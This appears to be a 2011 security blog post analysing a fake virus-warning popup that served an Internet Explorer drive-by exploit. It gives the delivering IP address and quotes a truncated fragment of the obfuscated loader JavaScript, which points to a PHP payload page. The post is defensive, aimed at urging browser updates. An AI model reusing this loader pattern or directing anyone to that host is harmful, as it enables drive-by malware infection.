by   March 22 2011   
Web browser exploits are just one more reason to update often. Security! Browser exploits seem to run seasonal for us in that we just don't see allot of these exploited advertisements and websites outside the marketing dates for major gift giving holidays. Could it mean virus developers have a sense of humor or is it profit?

Web browser exploits are just one more reason to update often. Security!

The Summary doesn't really describe what we will be showing here but it does feel at times we see more advertisement exploits than normal just around the holidays.

The Scripts we will be reviewing here are the random fake virus warning popups. These are easy to track if you can get to your cache before the page expires.

Microsoft's Security Updates about the exploits. Security Advisory I and the second read you might like: Critical Updates IE

Java Script cut by 22,000 to 38,000 characters.

The exploit was delivered from 188 . 124 . 5 . 154
Do not visit that address please. If you do , you risk your computer.

The IP is in Turkey and is a virtual server.
The first page you visit which would be the default home page index.html offers a simple javascript with the following information.

var d_e4da416a = '2_2ee665.php'+'?af'+'fid=';

(function() {
 var temp="",i,out="";
 var x5b61 = "60.(#(115.(#(99.(#(114.(#(105.(#(112.(#(116.(#(32.(#(116.(#(121.(#(112.(#(1



The top part looks like a typical download status layout which would be along the lines of those pop under advertisements.
The code to notice is the javascript and the php page.
The var x5b61 = changes on every page load I did.
The string 60.( continues hundreds of lines.
The var d_e4da416a which is random offers the page to the download (payload)

In my case the downloaded file was: 4_490bd6.php
And my var was different from the one I'm posting here. (This was round 4 of testing IE Exploit.)

Then it was your classical Executable file.
But the questions I couldn't get answered and haven't answered are.

1. Is this file installed due to the IE Exploit?
2. Is the exploit actually allowing the Executable file to run or would it require user input?

Articles I have read say it's always the user to blame for the new virus they just acquired.

Today we see more viruses being installed by browser exploits than email attachments or fake download pages.

Before you accuse a family member of downloading files that infected your computer look at your web browser first. If you don't have the newest version and updated with some type of linkscanner the odds are any advertisement banner from any website that had malicious code in the advertisement could have installed the virus. So don't yell at the one on the computer. Ask them what popups or redirects happened while they were surfing.

 

 

Web browser exploits are just one more reason to update often. Security! Browser exploits seem to run seasonal for us in that we just don't see allot of these exploited advertisements and websites outside the marketing dates for major gift giving holidays. Could it mean virus developers have a sense of humor or is it profit?